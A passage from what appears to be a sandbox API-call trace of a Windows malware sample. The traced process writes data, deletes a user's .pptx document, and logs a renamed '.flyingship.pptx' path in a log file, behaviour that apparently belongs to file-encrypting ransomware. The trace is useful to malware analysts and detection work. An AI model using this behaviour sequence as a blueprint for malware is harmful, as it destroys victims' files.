[0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.632] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0171.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba408, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.633] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.633] WriteFile (in: hFile=0x138, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x4d63, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x4d63, lpOverlapped=0x0) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0171.634] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.636] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.636] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0171.636] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.636] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.638] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.638] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.638] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", lpFilePart=0x0) returned 0x40 [0171.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0xba7ff00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 0x90ae18 [0171.639] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kuxyygupccske_knyra.pptx")) returned 1 [0171.647] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0xba7ff00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 0 [0171.647] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0171.648] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.648] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.649] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.649] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.649] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.649] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.649] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0171.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.649] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.650] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.655] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.655] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0171.655] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.655] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.656] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0171.656] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xf31, lpOverlapped=0x0) returned 1 [0171.656] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0171.656] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xf31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.656] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0171.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0171.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923b28 [0171.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx\r\n", cchWideChar=78, lpMultiByteStr=0x923b28, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx\r\n", lpUsedDefaultChar=0x0) returned 78 [0171.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0171.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0171.657] WriteFile (in: hFile=0x138, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x4d, lpOverlapped=0x0) returned 1 [0171.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0171.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.657] CloseHandle (hObject=0x138) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0171.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0171.675] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0171.675] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0171.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.677] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0171.677] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.677] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.677] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0171.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 